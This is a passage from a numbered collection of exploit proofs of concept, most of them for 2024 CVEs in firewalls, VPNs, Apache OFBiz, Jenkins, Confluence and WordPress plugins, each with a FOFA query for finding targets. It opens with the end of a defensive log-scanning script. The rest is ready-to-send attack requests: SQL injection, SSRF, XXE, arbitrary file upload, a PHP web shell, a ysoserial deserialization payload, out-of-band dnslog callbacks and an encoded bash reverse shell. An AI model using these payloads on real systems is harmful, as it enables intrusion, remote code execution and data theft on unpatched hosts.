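def inspect_request(path: str) -> list:
    """Rule names that fire for one raw request target."""
    decoded = unquote_plus(path)
    matched = [name for name, rx in RULES if rx.search(decoded)]
    if base64_sql_params(path.partition("?")[2]):
        matched.append("base64-sql")
    return matched


def scan(lines) -> list:
    """Return one hit record per log line that triggers at least one rule."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                       # not combined format; skip, do not crash
        rules = inspect_request(m["path"])
        if rules:
            hits.append({"ip": m["ip"], "path": m["path"],
                         "status": int(m["status"]), "rules": rules})
    return hits


def hits_by_ip(hits) -> dict:
    """Count flagged requests per source address for triage."""
    counts = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return counts


# Constructed sample log (not real traffic): five requests shaped like the
# POCs above plus two benign ones.
SAMPLE_LOG = [
    '203.0.113.10 - - [03/Jun/2024:09:12:01 +0800] "GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [03/Jun/2024:09:12:07 +0800] "GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1" 200 1983 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [03/Jun/2024:09:13:40 +0800] "GET /goform/webRead/open/?path=|id HTTP/1.1" 200 40 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [03/Jun/2024:09:13:41 +0800] "GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [03/Jun/2024:09:14:02 +0800] "GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20test HTTP/1.1" 200 77 "-" "Mozilla/5.0"',
    '192.0.2.5 - - [03/Jun/2024:09:14:10 +0800] "GET /index.html HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '192.0.2.5 - - [03/Jun/2024:09:14:11 +0800] "GET /search?q=hello+world HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ip"], hit["status"], hit["rules"], hit["path"][:60])
    print(hits_by_ip(scan(SAMPLE_LOG)))
```

A 200 on a flagged line is the interesting case: the ..;/ and .jsp;.js requests in particular should be 401 or 404 on a patched host, so status plus rule is a better alert key than the rule alone.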
93. Qi An Xin Legendsec (网神) SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

The upload is stored under /attachements/ with the original name; verify with:

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36


94. Qianxin Wangshen SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--


GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 value of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>


Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"


Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);


Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==


The SAMLRequest value is the base64 encoding of the following XML document:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 device cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host:192.168.0.1
Content-Length:41
Accept:application/json,text/javascript,*/*;q=0.01
X-Requested-with: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding:gzip,deflate
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
Connection:close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: (replace with your own token)
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip


Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"
configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"
jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png
----------767099171--

117. WordPress LayerSlider plugin SQL injection
Version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


Then access /home/src.php

119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo Smart S40 management platform web.php import arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328


Uploaded file path: /upload/2.php

121. Beijing Baichuo Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

File path: boot/web/upload/weblogo/1.php

122. Beijing Baichuo Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the base64-encoded SQL statement; decoded: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan Engineering Quality Inspection System arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
